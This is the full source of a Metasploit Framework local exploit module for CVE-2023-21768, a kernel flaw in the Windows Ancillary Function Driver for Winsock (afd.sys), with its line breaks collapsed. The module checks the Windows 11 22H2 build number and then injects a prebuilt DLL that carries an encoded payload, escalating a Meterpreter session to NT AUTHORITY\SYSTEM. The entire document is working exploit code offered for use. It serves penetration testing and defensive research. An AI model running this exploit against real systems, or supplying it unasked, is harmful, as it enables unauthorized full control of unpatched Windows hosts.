Ancillary Function Driver (AFD) For Winsock Privilege Escalation

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  include Msf::Post::Windows::FileInfo  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Ancillary Function Driver (AFD) for WinSock Elevation of Privilege',          'Description' => %q{            A vulnerability exists in the Windows Ancillary Function Driver for Winsock            (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of            NT AUTHORITY\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is            possible to create an arbitrary kernel Write-Where primitive, which can be used            to manipulate internal I/O ring structures and achieve local privilege            escalation.            This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in            January 2023 updates).          },          'License' => MSF_LICENSE,          'Author' => [            'chompie', # Github PoC            'b33f', # Github PoC            'Yarden Shafir', # I/O Ring R/W primitive PoC            'Christophe De La Fuente' # Metasploit module          ],          'Arch' => [ ARCH_X64 ],          'Platform' => 'win',          'SessionTypes' => [ 'meterpreter' ],          'Privileged' => true,          'Targets' => [            [ 'Windows 11 22H2 x64', { 'Arch' => ARCH_X64 } ]          ],          'Payload' => {            'DisableNops' => true          },          'References' => [            [ 'CVE', '2023-21768' ],            [ 'URL', 'https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768' ],            [ 'URL', 'https://github.com/yardenshafir/IoRingReadWritePrimitive' ]          ],          'DisclosureDate' => '2023-01-10',          'DefaultTarget' => 0,          'Notes' => {            'Stability' => [],            'Reliability' => [ REPEATABLE_SESSION ],            'SideEffects' => []          }        }      )    )  end  def check    unless session.platform == 'windows'      return Exploit::CheckCode::Safe('Only Windows systems are affected')    end    major, minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntoskrnl.exe')    vprint_status("Windows Build Number = #{build}.#{revision}")    unless major == 6 && minor == 2 && build == 22621      return CheckCode::Safe('The exploit only supports Windows 11 22H2')    end    if revision > 963      return CheckCode::Safe("This Windows host seems to be patched (build 22621.#{revision})")    end    CheckCode::Appears  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')    end    encoded_payload = payload.encoded    execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21768', 'CVE-2023-21768.x64.dll'),      [encoded_payload.length].pack('I<') + encoded_payload    )    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  endend